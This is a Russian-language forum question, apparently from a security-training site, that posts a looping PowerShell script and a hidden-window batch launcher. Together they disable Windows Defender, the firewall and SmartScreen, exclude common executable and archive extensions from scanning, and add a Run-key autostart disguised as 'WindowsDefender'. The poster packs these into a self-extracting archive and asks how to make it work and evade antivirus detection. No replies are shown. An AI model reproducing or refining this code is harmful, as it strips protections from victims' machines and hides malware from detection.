• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

Как полностью отключить Windows Defender и FireWall через файл

13.05.2024
7
0
Привет всем!
Я делаю шуточную программу, и для её запуска мне нужно отключить как "Windows Defender" так и "FireWall"
Вручную делать это долго, и я решил написать на .ps1 и .bat для запуска
Код .ps1
Bash:
do {
    # Отключение << "Windows Defender" / "FireWall" >>
    Set-MpPreference -DisableRealtimeMonitoring $true # Отключает Windows Defender (real-time)
    Set-MpPreference -MAPSReporting 0 # Отключает облачную защиту (cloud safe)
    Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False # Отключает FireWall

    # Исключения << '.exe' / '.bat' / '.ps1' / '.cmd' / '.py' / '.go' / '.zip' / '.rar' >>
    Add-MpPreference -ExclusionExtension .exe # АнтиВирус не проверяет данный тип процесса (.EXE)
    Add-MpPreference -ExclusionExtension .bat # АнтиВирус не проверяет данный тип процесса (.BAT)
    Add-MpPreference -ExclusionExtension .ps1 # АнтиВирус не проверяет данный тип процесса (.PS1)
    Add-MpPreference -ExclusionExtension .cmd # АнтиВирус не проверяет данный тип процесса (.CMD)
    Add-MpPreference -ExclusionExtension .py # АнтиВирус не проверяет данный тип процесса  (.PY)
    Add-MpPreference -ExclusionExtension .go # АнтиВирус не проверяет данный тип процесса  (.GO)
    Add-MpPreference -ExclusionExtension .zip # АнтиВирус не проверяет данный тип процесса (.ZIP)
    Add-MpPreference -ExclusionExtension .rar # АнтиВирус не проверяет данный тип процесса (.RAR)

    # Реестр << AutoRun NOT A Backdoor / FULL OFF WINDOWS DEFENDER >>
    New-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name WindowsDefender -PropertyType String -Value "C:\ProgramData\WindowsUpdate\WindowsDefender" # авто запуск
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -PropertyType DWord -Value "1" # полностю выключаем "WindowsDefender"
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value "0" # выключаем "SmartScreen"

    Start-Sleep 25
} while($true)
вот .bat
Bash:
powershell.exe -WindowStyle hidden- Command "C:\ProgramData\WindowsDefender\WindowsDefender.ps1"
Но это не сработало, ведь когда я их соединил в .sfx архиве с .rar сжатием оно просто перестало работать :/
B VirusTotal выдал это:
1719676127578.png


По отдельности их долго включать.
Кто знает как заставить это работать, и что стоит добавить в код для его андетекта, и для его функциональности?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD